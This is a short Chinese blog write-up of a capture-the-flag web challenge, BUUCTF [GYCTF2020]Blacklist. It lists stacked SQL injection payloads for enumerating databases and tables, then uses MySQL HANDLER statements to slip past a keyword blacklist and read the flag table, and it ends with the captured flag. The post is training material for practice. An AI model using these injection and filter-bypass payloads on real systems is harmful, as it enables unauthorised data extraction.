Buuctf-web-[GYCTF2020]Blacklist

首先随便注入一下

 

 

1';show databases;#  //获取数据库名

1';show tables;#    //获取表名

1’;desc `表名`    //获取表结构

当我们再次使用修改字段名这种方式的时候,发现过滤了这些关键字,该怎么办呢

于是,我们查了百度,然后又学会了一个新姿势

HANDLER [表名] OPEN;语句打开一个表,使其可以使用后续HANDLER [表名] READ;该表对象未被其他会话共享,并且在会话调用HANDLER [表名] CLOSE;或会话终止之前不会关闭

1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere close;#

执行这个,然后,就可以出来flag了

 

 

flag{7d92cf4a-b167-4a48-babe-1fc5ad19e472}
posted @ 2020-09-24 22:41  夜布多  阅读(184)  评论(0编辑  收藏  举报